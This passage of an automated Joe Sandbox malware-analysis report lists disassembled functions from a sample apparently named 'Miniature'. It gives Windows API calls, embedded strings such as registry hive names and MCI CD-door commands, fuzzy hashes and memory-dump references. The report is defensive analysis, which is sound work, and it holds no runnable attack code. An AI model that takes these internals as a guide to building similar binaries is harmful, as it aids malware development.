                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                            • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                            • Opcode ID: 3fb2e296ee5ef5ed20baf28ec86bec709ad916926d420c6f3a5f1533224f5924
                                                                                                                                                                                                                                                                                            • Instruction ID: 09e22f161615df5c4e83b27d5ad63f0d4904d57b11ecb2cf9b5eafa9b9483d6d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fb2e296ee5ef5ed20baf28ec86bec709ad916926d420c6f3a5f1533224f5924
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 401268356046019FCB14DF14C885B6ABBE5FF89714F04889DF89A9B3A2CB31ED45EB81
                                                                                                                                                                                                                                                                                            Function 00CA13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00CA1462
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA149D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CA14F0
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA1526
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA15A2
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA161D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2FD52: _wcslen.LIBCMT ref: 00C2FD5D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C73535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C73547
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                            • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                            • Opcode ID: 855fea810e9bf4ff185f00458a60d5c572daac20fb91a8285c68c279a3601caf
                                                                                                                                                                                                                                                                                            • Instruction ID: c5a84db064d336f1360eaebf91035e381963ca70ac3a8f6f58d5403be381c150
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 855fea810e9bf4ff185f00458a60d5c572daac20fb91a8285c68c279a3601caf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DFE1C3756083128FC704DF25C45096AB7E2FF96318F18895DF8A69B3A1DB30EE45DB81
                                                                                                                                                                                                                                                                                            Function 00C9D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                            • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                            • Opcode ID: ba5f660bf1405119f08e1f354431ba490b0d14a7240fc862b898b903a7904d84
                                                                                                                                                                                                                                                                                            • Instruction ID: ae0853080370afe4b014809a7d1a6a9d37aea004f250f488efce91f9e43496cc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba5f660bf1405119f08e1f354431ba490b0d14a7240fc862b898b903a7904d84
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 017107B260012A8BCF109F7CC9456FF33A1AB61754F220529F877BB294EA35DE45D790
                                                                                                                                                                                                                                                                                            Function 00CA8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA8DB5
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA8DC9
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA8DEC
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA8E0F
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CA8E4D
                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00CA6691), ref: 00CA8EA9
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CA8EE2
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CA8F25
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CA8F5C
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00CA8F68
                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CA8F78
                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?,00CA6691), ref: 00CA8F87
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CA8FA4
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CA8FB0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                            • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                            • Opcode ID: 1b53d653054e2fac7a2f92e8a787a4217eb7b0087b85895bb238657ed676592e
                                                                                                                                                                                                                                                                                            • Instruction ID: 6d2e6a79547fc2f6aa0ec82a3f56b86542d6b298b17e8e52ef86bc3d6410b4ed
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b53d653054e2fac7a2f92e8a787a4217eb7b0087b85895bb238657ed676592e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0610371900216FFEB14DFA4CC45BBE77A8BF0AB18F104106F925D61D0DB74AA84DBA0
                                                                                                                                                                                                                                                                                            Function 00C848BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00C8493D
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C84948
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C8499F
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C849DD
                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 00C84A1B
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C84A63
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C84A9E
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C84ACC
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                            • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                            • Opcode ID: e231000554742bb6036bb429113e5fc340f527b549e917e0437991f5d2e97ac5
                                                                                                                                                                                                                                                                                            • Instruction ID: f7da6e05c8d15caa3f8a2aba9725b8aef6e02dbf146824cfb92d6858a854f301
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e231000554742bb6036bb429113e5fc340f527b549e917e0437991f5d2e97ac5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 107105725082128FC714EF24C8809ABB7E4EF95758F40492DF8A697251EB30DE45DB91
                                                                                                                                                                                                                                                                                            Function 00C76382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00C76395
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C763A7
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00C763BE
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00C763D3
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00C763D9
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C763E9
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00C763EF
                                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C76410
                                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C7642A
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C76433
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7649A
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00C764D6
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C764DC
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C764E3
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C7653A
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00C76547
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C7656C
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C76596
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 206503aed86f16b3b9fc0610600e5519cec493b893bff40b5eb8f2d37f152d0c
                                                                                                                                                                                                                                                                                            • Instruction ID: 70e59ed6551300b6d40e3b7a45f4c8de5fd4b384a938fd0e56f89e6a50350f37
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 206503aed86f16b3b9fc0610600e5519cec493b893bff40b5eb8f2d37f152d0c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99719E31900A05AFDB20DFA9CE45BAEBBF5FF08708F104918E19BA35A0D775EA40CB50
                                                                                                                                                                                                                                                                                            Function 00C9086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00C90884
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00C9088F
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00C9089A
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00C908A5
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00C908B0
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00C908BB
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00C908C6
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00C908D1
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00C908DC
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00C908E7
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00C908F2
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00C908FD
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00C90908
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00C90913
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00C9091E
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00C90929
                                                                                                                                                                                                                                                                                            • GetCursorInfo.USER32(?), ref: 00C90939
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C9097B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c5c8de04d63524c0e0e0e5859e9f6b87fa9dc14011bd202528b4c8f7cb111f2f
                                                                                                                                                                                                                                                                                            • Instruction ID: 81f3cee53eef69111e3020a3d2674495a03955d56964fb27d5b3ec8c671dd5b4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5c8de04d63524c0e0e0e5859e9f6b87fa9dc14011bd202528b4c8f7cb111f2f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D4172B0D483196EDB109FBA8C8996EBFE8FF04754B50452AE11DE7281DA789901CF91
                                                                                                                                                                                                                                                                                            Function 00C30436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00C30436
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00CE170C,00000FA0,0A96AC4E,?,?,?,?,00C52733,000000FF), ref: 00C3048C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00C52733,000000FF), ref: 00C30497
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00C52733,000000FF), ref: 00C304A8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00C304BE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C304CC
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C304DA
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C30505
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C30510
                                                                                                                                                                                                                                                                                            • ___scrt_fastfail.LIBCMT ref: 00C30457
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C30413: __onexit.LIBCMT ref: 00C30419
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • InitializeConditionVariable, xrefs: 00C304B8
                                                                                                                                                                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C30492
                                                                                                                                                                                                                                                                                            • kernel32.dll, xrefs: 00C304A3
                                                                                                                                                                                                                                                                                            • WakeAllConditionVariable, xrefs: 00C304D2
                                                                                                                                                                                                                                                                                            • SleepConditionVariableCS, xrefs: 00C304C4
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                            • Opcode ID: 9674fe0e2ac3344cbdae11a3e5a777c260a466b8c9210d22132c377a763f5fbc
                                                                                                                                                                                                                                                                                            • Instruction ID: ddfe6b2efdf90c8146a47d6e0091f36a26a69420d569cb1a55d8269690aa0a75
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9674fe0e2ac3344cbdae11a3e5a777c260a466b8c9210d22132c377a763f5fbc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41210533A507046FD7206BB4AC56BAE37A8EB05FA6F240139FA03976D0DF709D408A95
                                                                                                                                                                                                                                                                                            Function 00C73A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                            • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                                            • Opcode ID: 3307fcabd96b2ec6c250aac77affef1448e34e95a6e60ce3baab942a0fa0195e
                                                                                                                                                                                                                                                                                            • Instruction ID: 2d2c04ab47c75054ef29b57d018034103f42fc78a135223e4c2fdbb10318137f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3307fcabd96b2ec6c250aac77affef1448e34e95a6e60ce3baab942a0fa0195e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53E1E332A00556ABCF189FB4C8416EDBBB4BF54750F10C22AE46AE7250DB30AF85F790
                                                                                                                                                                                                                                                                                            Function 00C84F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(00000000,00000000,00CADCD0), ref: 00C84F6C
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C84F80
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C84FDE
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C85039
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C85084
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C850EC
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2FD52: _wcslen.LIBCMT ref: 00C2FD5D
                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,00CD7C10,00000061), ref: 00C85188
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
